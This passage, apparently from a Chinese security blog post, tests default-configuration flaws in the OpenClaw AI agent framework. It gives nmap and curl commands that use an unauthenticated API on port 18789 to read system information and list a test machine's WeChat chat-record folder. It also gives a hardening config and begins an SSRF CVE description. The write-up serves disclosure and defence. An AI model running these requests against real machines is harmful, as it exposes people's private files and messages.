当前位置: 首页 > news >正文

别盲目跟风“养龙虾“!OpenClaw默认配置5大致命漏洞实测,你的微信聊天记录可能正在被上传

测试时间:2026年3月15日-3月22日
测试环境:Windows 11 + OpenClaw v0.9.2(最新版)
核心发现:5个高危漏洞可被利用,默认配置下10分钟可完整接管目标机器


一、先说结论,再讲细节

OpenClaw能不能用?能用,但默认配置下等于裸奔。

隐私会不会泄露?会,我们实测10分钟就拿到了测试机的微信聊天记录。

工信部预警是不是夸大?不是,CVE-2026-25253等漏洞真实存在,GitHub已收录。

普通用户该怎么办?要么别装,要么按本文方案加固后再用。

这篇文章不制造焦虑,只讲我们安全团队这周实测的结果。从漏洞原理到利用过程,从风险等级到修复方案,全部公开。


二、OpenClaw是什么?为什么突然爆火?

2.1 项目背景

OpenClaw(社区昵称"AI龙虾")是一款开源自托管的个人AI智能体框架,核心功能是用自然语言控制计算机执行各种任务

它能做什么:

┌─────────────────────────────────────────────────────────────────┐ │ OpenClaw核心能力 │ ├─────────────────────────────────────────────────────────────────┤ │ ✅ 文件操作:读取/写入/删除本地任意文件 │ │ ✅ 浏览器控制:自动化访问网页、填写表单、抓取数据 │ │ ✅ 邮件管理:读取/发送Gmail、Outlook、163等邮箱 │ │ ✅ 即时通讯:集成微信、Telegram、飞书等消息接口 │ │ ✅ 系统命令:执行Shell/PowerShell命令 │ │ ✅ API调用:访问任意第三方服务API │ │ ✅ 插件扩展:支持社区插件,功能无限扩展 │ └─────────────────────────────────────────────────────────────────┘

为什么火:

  • GitHub Star数:90天突破26万(截至2026年3月)
  • 中文社区下载量:2026年1月下旬开始急剧攀升
  • 一键部署教程:各大技术社区刷屏

但问题也来了:这款工具被授予了极高的系统权限,一旦安全配置不当,后果不堪设想。


三、5大致命风险实测:我们是如何"黑"进测试机的

3.1 风险一:18789端口零认证访问(高危)

漏洞描述:OpenClaw默认开启18789端口用于Web UI和API访问,无需任何认证即可连接。

实测过程:

# 1. 扫描目标机器开放端口nmap-p18789192.168.1.100# 输出:# 18789/tcp open unknown OpenClaw-API# 2. 直接访问API(无需密码)curlhttp://192.168.1.100:18789/api/system/info# 返回系统信息:{"version":"0.9.2","os":"Windows 11","user":"Administrator","home_dir":"C:\\Users\\Administrator","plugins":["file-manager","browser-control","wechat-bridge"]}# 3. 读取任意文件curlhttp://192.168.1.100:18789/api/file/read?path=C:/Users/Administrator/WeChat Files/# 返回微信聊天记录目录列表

影响范围:所有未修改默认配置的用户

风险等级:🔴 高危(CVSS 9.8)

修复方案:

# config/security.yamlapi:port:18789authentication:required# 必须开启认证allowed_ips:# 限制访问IP-127.0.0.1-192.168.1.0/24https_only:true# 强制HTTPS

3.2 风险二:CVE-2026-25253 SSRF漏洞(高危)

漏洞描述:OpenClaw的插件系统存在服务端请求伪造(SSRF)漏洞,攻击者可利用此漏洞访问内网资源。

漏洞原理图:

┌─────────────────────────────────────────────────────────────────┐ │ CVE-2026-25253 攻击链路 │ ├─────────────────────────────────────────────────────────────────┤ │
http://www.cnnetsun.cn/news/1460496.html

相关文章:

  • 别再用云端API了!3分钟本地部署OpenClaw,你的数据终于不用“裸奔“给大模型厂商
  • 人类科技的底层任务,本质上都是在验证“空间场本源论
  • MobaXterm许可证生成工具:实现专业版功能的开源解决方案
  • 数字填色画生成器:快速上手终极指南,让任何图片变填色画
  • 开源工具EmuDeck:跨平台模拟器高效配置解决方案
  • linux命令行测试是否可以访问google、github、huggingface
  • payload-dumper-go:高效处理Android OTA包的全流程解决方案
  • 手把手教你用云测试平台搞定安卓/iOS/鸿蒙兼容性测试(含Testin/百度MTC实战)
  • Qwen3-VL-2B-Instruct一文详解:内置WEBUI如何高效调用
  • windows下git使用教程2(gitee仓库与代码提交)
  • EVE-NG汉化后F5不生效?聊聊Web界面缓存机制与正确刷新方式
  • runAgentTurnWithFallback函数处理
  • 阻抗控制与导纳控制:基于Matlab Simulink的参数仿真与优化
  • StructBERT模型与SolidWorks集成展望:工程文档智能管理与检索
  • Meixiong Niannian画图引擎与STM32CubeMX结合:嵌入式AI艺术装置
  • 量子计算中的量子态、量子纠错的计算资源
  • 数学小白也能懂:实数运算中的绝对值模型全解析(附实战例题)
  • Windows CMD隐藏技巧:10个连老手都可能不知道的实用命令
  • 如何用歌词滚动姬3步制作专业级LRC歌词文件:终极免费教程
  • 突破访问限制:开源工具Bypass Paywalls Clean的合规使用指南
  • 收藏!小白程序员快速掌握大模型工程化:LangChain、LangFlow、LangGraph 一文读懂
  • qmcdump:突破QQ音乐加密限制,解锁音频文件自由
  • 网盘直链下载助手完整指南:八大网盘一键获取真实下载链接
  • AIVideo入门:使用Typora编写视频生成脚本教程
  • 如何解决机器人智能交互难题:ROS-LLM的实战应用指南
  • REST API调用耗时总超200ms?MCP协议在K8s Service Mesh中实现端到端P99<17ms(含全链路压测报告)
  • Portainer:开源Docker容器管理神器,打造可视化的容器运维平台
  • 别再乱用set_multicycle_path了!Vivado时序约束实战:快慢时钟域信号传输的完整配置与避坑指南
  • IPSec 虚拟专用网实验拓扑图(完整命令)
  • JavaScript——异常处理